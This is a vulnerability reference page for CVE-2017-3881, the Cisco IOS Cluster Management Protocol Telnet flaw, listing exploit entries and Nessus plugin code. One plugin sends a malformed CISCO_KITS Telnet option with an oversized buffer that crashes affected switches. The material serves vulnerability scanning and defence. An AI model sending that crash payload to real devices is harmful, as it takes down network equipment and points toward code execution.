CVE-2017-3881 - Improper Input Validation vulnerability in Cisco IOS
Summary
A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables: This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages the implicit trust often placed in environment variables.
- Server Side Include (SSI) Injection: An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
- Cross Zone Scripting: An attacker is able to cause a victim to load content into their web browser that bypasses security zone controls and gains access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content they are allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attacker's content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter relates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.
- Cross Site Scripting through Log Files: An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attacker's scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
- Command Line Execution through SQL Injection: An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (which could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes the data plane by spawning new commands to be executed on the host.
Exploit-Db
description | Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform. Tags: Remote |
id | EDB-ID:42122 |
last seen | 2017-06-05 |
modified | 2017-04-12 |
published | 2017-04-12 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/42122/ |
title | Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution |

description | Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform |
id | EDB-ID:41874 |
last seen | 2017-04-13 |
modified | 2017-04-12 |
published | 2017-04-12 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/41874/ |
title | Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution |

description | Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform. Tags: Remote |
file | exploits/hardware/remote/41872.py |
id | EDB-ID:41872 |
last seen | 2017-04-12 |
modified | 2017-04-12 |
platform | hardware |
port | 23 |
published | 2017-04-12 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/41872/ |
title | Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution |
type | remote |
Metasploit
description | This module triggers a Denial of Service condition in the Cisco IOS telnet service affecting multiple Cisco switches. Tested against Cisco Catalyst 2960 and 3750. |
id | MSF:AUXILIARY/DOS/CISCO/IOS_TELNET_ROCEM |
last seen | 2020-06-13 |
modified | 2017-07-24 |
published | 2017-06-25 |
references | |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/cisco/ios_telnet_rocem.rb |
title | Cisco IOS Telnet Denial of Service |
Nessus
NASL family | CISCO |
NASL id | CISCO-SA-20170317-CMP-IOS.NASL |
description | According to its self-reported version and configuration, the Cisco IOS software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code. |
last seen | 2020-03-17 |
modified | 2017-03-27 |
plugin id | 97991 |
published | 2017-03-27 |
reporter | This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/97991 |
title | Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) |
code |

#TRUSTED
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(97991);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2019/04/10");

  script_cve_id("CVE-2017-3881");
  script_bugtraq_id(96960);
  script_xref(name:"CISCO-BUG-ID", value:"CSCvd48893");
  script_xref(name:"IAVA", value:"2017-A-0073");
  script_xref(name:"CISCO-SA", value:"cisco-sa-20170317-cmp");

  script_name(english:"Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)");
  script_summary(english:"Checks the IOS version.");

  script_set_attribute(attribute:"synopsis", value:
"The remote device is missing a vendor-supplied security patch.");
  script_set_attribute(attribute:"description", value:
"According to its self-reported version and configuration, the Cisco IOS
software running on the remote device is affected by a remote code
execution vulnerability in the Cluster Management Protocol (CMP)
subsystem due to improper handling of CMP-specific Telnet options.

An unauthenticated, remote attacker can exploit this by establishing a
Telnet session with malformed CMP-specific telnet options, to execute
arbitrary code.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7cb68237");
  script_set_attribute(attribute:"solution", value:
"Upgrade to the relevant fixed version referenced in Cisco bug ID
CSCvd48893. Alternatively, as a workaround, disable the Telnet protocol
for incoming connections.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-3881");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/27");

  script_set_attribute(attribute:"plugin_type", value:"combined");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:cisco:ios");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CISCO");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("cisco_ios_version.nasl");
  script_require_keys("Host/Cisco/IOS/Version");

  exit(0);
}

include("audit.inc");
include("cisco_func.inc");
include("cisco_kb_cmd_func.inc");

flag = 0;
override = 0;
cmds = make_list();

ver = get_kb_item_or_exit("Host/Cisco/IOS/Version");

# Check for vuln version
# these were extracted from the CVRF
if (
  ver == "12.2(18)S" || ver == "12.2(25)S" || ver == "12.2(25)S1" || ver == "12.1(22)EA8" ||
  ver == "12.1(11)EA1a" || ver == "12.1(22)EA12" || ver == "12.1(22)EA6" || ver == "12.1(14)EA1" ||
  ver == "12.1(19)EA1b" || ver == "12.1(22)EA3" || ver == "12.1(14)EA1b" || ver == "12.1(20)EA2" ||
  ver == "12.1(22)EA4a" || ver == "12.1(14)EA1a" || ver == "12.1(22)EA5a" || ver == "12.1(22)EA13" ||
  ver == "12.1(22)EA1a" || ver == "12.1(12c)EA1a" || ver == "12.1(13)EA1c" || ver == "12.1(22)EA1b" ||
  ver == "12.1(8)EA1c" || ver == "12.1(22)EA5" || ver == "12.1(22)EA10b" || ver == "12.1(20)EA1a" ||
  ver == "12.1(22)EA11" || ver == "12.1(22)EA7" || ver == "12.1(22)EA1" || ver == "12.1(13)EA1b" ||
  ver == "12.1(20)EA1" || ver == "12.1(13)EA1" || ver == "12.1(19)EA1a" || ver == "12.1(22)EA2" ||
  ver == "12.1(19)EA1d" || ver == "12.1(22)EA9" || ver == "12.1(9)EA1" || ver == "12.1(22)EA14" ||
  ver == "12.1(11)EA1" || ver == "12.1(22)EA8a" || ver == "12.1(12c)EA1" || ver == "12.1(22)EA10a" ||
  ver == "12.1(19)EA1" || ver == "12.1(19)EA1c" || ver == "12.1(6)EA1" || ver == "12.1(22)EA10" ||
  ver == "12.1(22)EA4" || ver == "12.1(13)EA1a" || ver == "12.1(22)EA6a" || ver == "12.2(25)EW" ||
  ver == "12.2(20)EWA" || ver == "12.2(25)EWA" || ver == "12.2(25)EWA6" || ver == "12.2(25)EWA5" ||
  ver == "12.2(25)EWA1" || ver == "12.2(25)EWA10" || ver == "12.2(25)EWA8" || ver == "12.2(20)EWA1" ||
  ver == "12.2(25)EWA11" || ver == "12.2(25)EWA9" || ver == "12.2(25)EWA2" || ver == "12.2(25)EWA14" ||
  ver == "12.2(25)EWA4" || ver == "12.2(20)EWA3" || ver == "12.2(25)EWA3" || ver == "12.2(25)EWA7" ||
  ver == "12.2(20)EWA4" || ver == "12.2(25)EWA12" || ver == "12.2(25)EWA13" || ver == "12.2(20)EWA2" ||
  ver == "12.2(35)SE" || ver == "12.2(18)SE" || ver == "12.2(20)SE" || ver == "12.2(25)SE" ||
  ver == "12.2(37)SE" || ver == "12.2(53)SE1" || ver == "12.2(55)SE" || ver == "12.2(25)SE2" ||
  ver == "12.2(40)SE2" || ver == "12.2(46)SE" || ver == "12.2(46)SE2" || ver == "12.2(50)SE2" ||
  ver == "12.2(35)SE5" || ver == "12.2(50)SE1" || ver == "12.2(44)SE2" || ver == "12.2(20)SE3" ||
  ver == "12.2(35)SE1" || ver == "12.2(50)SE5" || ver == "12.2(44)SE1" || ver == "12.2(53)SE" ||
  ver == "12.2(37)SE1" || ver == "12.2(25)SE3" || ver == "12.2(35)SE3" || ver == "12.2(44)SE4" ||
  ver == "12.2(55)SE3" || ver == "12.2(55)SE2" || ver == "12.2(40)SE" || ver == "12.2(44)SE" ||
  ver == "12.2(52)SE" || ver == "12.2(58)SE" || ver == "12.2(50)SE3" || ver == "12.2(55)SE1" ||
  ver == "12.2(35)SE2" || ver == "12.2(18)SE1" || ver == "12.2(40)SE1" || ver == "12.2(20)SE1" ||
  ver == "12.2(44)SE6" || ver == "12.2(44)SE3" || ver == "12.2(53)SE2" || ver == "12.2(52)SE1" ||
  ver == "12.2(46)SE1" || ver == "12.2(20)SE2" || ver == "12.2(54)SE" || ver == "12.2(44)SE5" ||
  ver == "12.2(50)SE4" || ver == "12.2(50)SE" || ver == "12.2(20)SE4" || ver == "12.2(58)SE1" ||
  ver == "12.2(55)SE4" || ver == "12.2(58)SE2" || ver == "12.2(55)SE5" || ver == "12.2(55)SE6" ||
  ver == "12.2(55)SE7" || ver == "12.2(55)SE8" || ver == "12.2(55)SE9" || ver == "12.2(55)SE10" ||
  ver == "12.2(55)SE11" || ver == "12.1(14)AZ" || ver == "12.2(20)EU" || ver == "12.2(20)EU1" ||
  ver == "12.2(20)EU2" || ver == "12.2(20)EX" || ver == "12.2(44)EX" || ver == "12.2(40)EX3" ||
  ver == "12.2(40)EX" || ver == "12.2(52)EX" || ver == "12.2(44)EX1" || ver == "12.2(40)EX2" ||
  ver == "12.2(40)EX1" || ver == "12.2(55)EX" || ver == "12.2(46)EX" || ver == "12.2(52)EX1" ||
  ver == "12.2(55)EX1" || ver == "12.2(55)EX2" || ver == "12.2(55)EX3" || ver == "12.2(58)EX" ||
  ver == "12.2(25)SEB" || ver == "12.2(25)SEB2" || ver == "12.2(25)SEB1" || ver == "12.2(25)SEB4" ||
  ver == "12.2(25)SEB3" || ver == "12.2(25)SEA" || ver == "12.2(25)EY" || ver == "12.2(46)EY" ||
  ver == "12.2(55)EY" || ver == "12.2(25)EY1" || ver == "12.2(53)EY" || ver == "12.2(25)EY3" ||
  ver == "12.2(37)EY" || ver == "12.2(25)EY2" || ver == "12.2(25)EY4" || ver == "12.2(25)EZ" ||
  ver == "12.2(25)EZ1" || ver == "12.2(58)EZ" || ver == "12.2(53)EZ" || ver == "12.2(55)EZ" ||
  ver == "12.2(60)EZ4" || ver == "12.2(60)EZ5" || ver == "12.2(25)SEC" || ver == "12.2(25)SEC2" ||
  ver == "12.2(25)SEC1" || ver == "12.2(31)SG" || ver == "12.2(25)SG" || ver == "12.2(37)SG" ||
  ver == "12.2(44)SG" || ver == "12.2(50)SG3" || ver == "12.2(31)SG1" || ver == "12.2(53)SG" ||
  ver == "12.2(31)SG3" || ver == "12.2(50)SG6" || ver == "12.2(53)SG1" || ver == "12.2(137)SG" ||
  ver == "12.2(46)SG" || ver == "12.2(25)SG1" || ver == "12.2(53)SG2" || ver == "12.2(50)SG5" ||
  ver == "12.2(37)SG1" || ver == "12.2(53)SG3" || ver == "12.2(50)SG8" || ver == "12.2(25)SG3" ||
  ver == "12.2(50)SG2" || ver == "12.2(40)SG" || ver == "12.2(25)SG2" || ver == "12.2(54)SG1" ||
  ver == "12.2(44)SG1" || ver == "12.2(50)SG1" || ver == "12.2(52)SG" || ver == "12.2(54)SG" ||
  ver == "12.2(144)SG" || ver == "12.2(31)SG2" || ver == "12.2(50)SG" || ver == "12.2(25)SG4" ||
  ver == "12.2(50)SG7" || ver == "12.2(53)SG4" || ver == "12.2(50)SG4" || ver == "12.2(46)SG1" ||
  ver == "12.2(53)SG5" || ver == "12.2(53)SG6" || ver == "12.2(53)SG7" || ver == "12.2(53)SG8" ||
  ver == "12.2(53)SG9" || ver == "12.2(53)SG10" || ver == "12.2(53)SG11" || ver == "12.2(25)FX" ||
  ver == "12.2(25)FY" || ver == "12.2(25)SEF" || ver == "12.2(25)SEF1" || ver == "12.2(25)SEF2" ||
  ver == "12.2(25)SEF3" || ver == "12.2(25)SEE" || ver == "12.2(25)SEE1" || ver == "12.2(25)SEE3" ||
  ver == "12.2(25)SEE4" || ver == "12.2(25)SEE2" || ver == "12.2(25)SED" || ver == "12.2(25)SED1" ||
  ver == "12.2(31)SGA" || ver == "12.2(31)SGA3" || ver == "12.2(31)SGA2" || ver == "12.2(31)SGA10" ||
  ver == "12.2(31)SGA5" || ver == "12.2(31)SGA4" || ver == "12.2(31)SGA11" || ver == "12.2(31)SGA6" ||
  ver == "12.2(31)SGA1" || ver == "12.2(31)SGA7" || ver == "12.2(31)SGA8" || ver == "12.2(31)SGA9" ||
  ver == "12.2(25)SEG" || ver == "12.2(25)SEG1" || ver == "12.2(25)SEG3" || ver == "12.2(25)FZ" ||
  ver == "12.2(52)XO" || ver == "12.2(54)XO" || ver == "12.2(40)XO" || ver == "12.2(44)SQ" ||
  ver == "12.2(44)SQ2" || ver == "12.2(50)SQ2" || ver == "12.2(50)SQ1" || ver == "12.2(50)SQ" ||
  ver == "12.2(50)SQ3" || ver == "12.2(50)SQ4" || ver == "12.2(50)SQ5" || ver == "12.2(50)SQ6" ||
  ver == "12.2(50)SQ7" || ver == "15.0(1)XO1" || ver == "15.0(1)XO" || ver == "15.0(2)XO" ||
  ver == "15.2(4)S2" || ver == "15.2(4)S3" || ver == "15.0(1)EY" || ver == "15.0(1)EY1" ||
  ver == "15.0(1)EY2" || ver == "15.0(2)EY" || ver == "15.0(2)EY1" || ver == "15.0(2)EY2" ||
  ver == "15.0(2)EY3" || ver == "12.2(54)WO" || ver == "15.0(1)SE" || ver == "15.0(2)SE" ||
  ver == "15.0(1)SE1" || ver == "15.0(1)SE2" || ver == "15.0(1)SE3" || ver == "15.0(2)SE1" ||
  ver == "15.0(2)SE2" || ver == "15.0(2)SE3" || ver == "15.0(2)SE4" || ver == "15.0(2)SE5" ||
  ver == "15.0(2)SE6" || ver == "15.0(2)SE7" || ver == "15.0(2)SE8" || ver == "15.0(2)SE9" ||
  ver == "15.0(2a)SE9" || ver == "15.0(2)SE10" || ver == "15.0(2)SE10a" || ver == "15.0(1)SY1" ||
  ver == "15.1(1)SG" || ver == "15.1(2)SG" || ver == "15.1(1)SG1" || ver == "15.1(1)SG2" ||
  ver == "15.1(2)SG1" || ver == "15.1(2)SG2" || ver == "15.1(2)SG3" || ver == "15.1(2)SG4" ||
  ver == "15.1(2)SG5" || ver == "15.1(2)SG6" || ver == "15.1(2)SG7" || ver == "15.1(2)SG8" ||
  ver == "15.0(2)SG" || ver == "15.0(2)SG1" || ver == "15.0(2)SG2" || ver == "15.0(2)SG3" ||
  ver == "15.0(2)SG4" || ver == "15.0(2)SG5" || ver == "15.0(2)SG6" || ver == "15.0(2)SG7" ||
  ver == "15.0(2)SG8" || ver == "15.0(2)SG9" || ver == "15.0(2)SG10" || ver == "15.0(2)SG11" ||
  ver == "15.0(2)EX" || ver == "15.0(2)EX1" || ver == "15.0(2)EX2" || ver == "15.0(2)EX3" ||
  ver == "15.0(2)EX4" || ver == "15.0(2)EX5" || ver == "15.0(2)EX6" || ver == "15.0(2)EX7" ||
  ver == "15.0(2)EX8" || ver == "15.0(2a)EX5" || ver == "15.0(2)EX10" || ver == "15.1(2)EY1" ||
  ver == "15.3(1)S1" || ver == "15.0(2)EC" || ver == "15.0(2)EB" || ver == "15.2(1)E" ||
  ver == "15.2(2)E" || ver == "15.2(1)E1" || ver == "15.2(3)E" || ver == "15.2(1)E2" ||
  ver == "15.2(1)E3" || ver == "15.2(2)E1" || ver == "15.2(2b)E" || ver == "15.2(4)E" ||
  ver == "15.2(3)E1" || ver == "15.2(2)E2" || ver == "15.2(2a)E1" || ver == "15.2(2)E3" ||
  ver == "15.2(2a)E2" || ver == "15.2(3)E2" || ver == "15.2(3a)E" || ver == "15.2(3a)E1" ||
  ver == "15.2(3)E3" || ver == "15.2(3m)E2" || ver == "15.2(4)E1" || ver == "15.2(2)E4" ||
  ver == "15.2(2)E5" || ver == "15.2(4)E2" || ver == "15.2(4m)E1" || ver == "15.2(3)E4" ||
  ver == "15.2(5)E" || ver == "15.2(3m)E7" || ver == "15.2(4)E3" || ver == "15.2(2)E6" ||
  ver == "15.2(5a)E" || ver == "15.2(5)E1" || ver == "15.2(5b)E" || ver == "15.2(4m)E3" ||
  ver == "15.2(3m)E8" || ver == "15.2(2)E5a" || ver == "15.2(5c)E" || ver == "15.2(3)E5" ||
  ver == "15.2(2)E5b" || ver == "15.2(4n)E2" || ver == "15.2(4o)E2" || ver == "15.2(5a)E1" ||
  ver == "15.2(4p)E1" || ver == "15.2(5)E2b" || ver == "15.1(3)MRA4" || ver == "15.0(2)ED" ||
  ver == "15.0(2)EZ" || ver == "15.2(1)EY" || ver == "15.0(2)EJ" || ver == "15.0(2)EJ1" ||
  ver == "15.4(3)M7a" || ver == "15.5(3)S7a" || ver == "15.2(2)EB" || ver == "15.2(2)EB1" ||
  ver == "15.2(2)EB2" || ver == "15.3(3)JN13" || ver == "12.4(25e)JAP1n" || ver == "15.0(2)SQD" ||
  ver == "15.0(2)SQD1" || ver == "15.0(2)SQD2" || ver == "15.0(2)SQD3" || ver == "15.0(2)SQD4" ||
  ver == "15.0(2)SQD5" || ver == "15.6(2)S0a" || ver == "15.6(2)S3" || ver == "15.3(3)JBB6a" ||
  ver == "15.3(3)JNC4" || ver == "15.6(2)SP5" || ver == "15.3(3)JPB" || ver == "15.2(4)EC1" ||
  ver == "15.2(4)EC2" || ver == "15.3(3)JPC3"
) flag++;

if (!flag) audit(AUDIT_INST_VER_NOT_VULN, "Cisco IOS", ver);

# Check that device is configured to accept incoming Telnet connections
if (get_kb_item("Host/local_checks_enabled"))
{
  flag = 0;

  # from the advisory
  command = "show running-config | include ^line vty|transport input";
  command_kb = "Host/Cisco/Config/" + command;
  buf = cisco_command_kb_item(command_kb, command);
  if (check_cisco_result(buf))
  {
    # if transport input lists "all" or "telnet", we are vuln
    # otherwise, if there is a "line vty" that is not followed by a
    # transport input line, we are vuln
    # otherwise, we are not vuln
    if (preg(string:buf, pattern:"^\s+transport input.*(all|telnet).*", multiline:TRUE))
    {
      flag = 1;
      cmds = make_list(command);
    }
    else
    {
      lines = split(buf, keep:FALSE);
      for (i = 0; i < max_index(lines); i++)
      {
        line = lines[i];
        if ((i+1) >= max_index(lines)) next_line = "";
        else next_line = lines[i+1];

        if (line =~ "^line vty" && next_line !~ "^\s+transport input")
        {
          flag = 1;
          cmds = make_list(command);
        }
      }
    }
  }
  else if (cisco_needs_enable(buf))
  {
    flag = 1;
    override = 1;
  }

  if (!flag && !override) audit(AUDIT_OS_CONF_NOT_VULN, "Cisco IOS", ver);
}

if (flag)
{
  security_report_cisco(
    port     : 0,
    severity : SECURITY_HOLE,
    override : override,
    version  : ver,
    bug_id   : 'CSCvd48893',
    cmds     : cmds
  );
}
else audit(AUDIT_HOST_NOT, "affected");
NASL family | CISCO |
NASL id | CISCO-SA-20170317-CMP-DOS.NASL |
description | The remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 103783 |
published | 2017-10-11 |
reporter | This script is Copyright (C) 2017-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/103783 |
title | Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) (destructive check) |
code |

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(103783);
  script_version("1.4");
  script_cvs_date("Date: 2018/07/06 11:26:06");

  script_cve_id("CVE-2017-3881");
  script_bugtraq_id(96960);
  script_xref(name:"CISCO-BUG-ID", value:"CSCvd48893");
  script_xref(name:"IAVA", value:"2017-A-0073");
  script_xref(name:"CISCO-SA", value:"cisco-sa-20170317-cmp");

  script_name(english:"Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) (destructive check)");
  script_summary(english:"Attempts to crash a Cisco switch.");

  script_set_attribute(attribute:"synopsis", value:
"The remote device is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote device is affected by a remote code execution vulnerability
in the Cluster Management Protocol (CMP) subsystem due to improper
handling of CMP-specific Telnet options.

An unauthenticated, remote attacker can exploit this by establishing a
Telnet session with malformed CMP-specific telnet options, to execute
arbitrary code.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7cb68237");
  script_set_attribute(attribute:"solution", value:
"Upgrade to the relevant fixed version referenced in Cisco bug ID
CSCvd48893. Alternatively, as a workaround, disable the Telnet protocol
for incoming connections.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/10/11");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:cisco:ios");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_KILL_HOST);
  script_family(english:"CISCO");

  script_copyright(english:"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.");

  script_dependencies("telnet.nasl");
  script_require_ports("Services/telnet", 23);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("telnet_func.inc");

port = get_service(svc: 'telnet', default: 23, exit_on_fail: 1);
soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_SOCK_FAIL, port);

IAC     = '\xff';
ENV     = '\x24';
IS      = '\x00';
SEND    = '\x01';
USERVAR = '\x03';
VALUE   = '\x01';
SB      = raw_string(OPT_SUBOPT);
SE      = raw_string(OPT_ENDSUBOPT);

# Consume what the server sends
telnet_negotiate(socket:soc);

# Query environment variables
req = IAC + SB + ENV + SEND + USERVAR + IAC + SE;
send(socket: soc, data: req);
r = recv(socket: soc, length: 1024);

# Affected devices should have the "CISCO_KITS" variable
env_name = 'CISCO_KITS';
if (env_name >!< r)
{
  audit(AUDIT_HOST_NOT, 'affected');
}

# Three parts in env value
env_val = '3:' + crap(data:'A', length:0x400)  # data to be copied to a stack buf
                                                # seen: 0x80 bytes to RA
        + ':9:';

# Attempt to crash the switch
req = IAC + SB + ENV + IS + USERVAR + env_name + VALUE + env_val + IAC + SE;
send(socket: soc, data: req);
sleep(3);
close(soc);

if (service_is_dead(port:port))
{
  security_report_v4(port: port, severity: SECURITY_HOLE);
}
else
{
  audit(AUDIT_HOST_NOT, 'affected');
}
NASL family CISCO NASL id CISCO-SA-20170317-CMP-IOSXE.NASL description According to its self-reported version and configuration, the Cisco IOS XE software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code. last seen 2020-03-17 modified 2017-03-27 plugin id 97992 published 2017-03-27 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97992 title Cisco IOS XE Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) code #TRUSTED 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 # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(97992); script_version("1.9"); script_set_attribute(attribute:"plugin_modification_date", value:"2019/04/10"); script_cve_id("CVE-2017-3881"); script_bugtraq_id(96960); script_xref(name:"CISCO-BUG-ID", value:"CSCvd48893"); script_xref(name:"IAVA", value:"2017-A-0073"); script_xref(name:"CISCO-SA", value:"cisco-sa-20170317-cmp"); script_name(english:"Cisco IOS XE Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)"); script_summary(english:"Checks the IOS XE version."); script_set_attribute(attribute:"synopsis", value: "The remote device is missing a vendor-supplied security patch."); script_set_attribute(attribute:"description", value: "According to its self-reported version and configuration, the Cisco IOS XE software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. 
An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code."); # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7cb68237"); script_set_attribute(attribute:"solution", value: "Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvd48893. Alternatively, as a workaround, disable the Telnet protocol for incoming connections."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/17"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/27"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/o:cisco:ios_xe"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CISCO"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
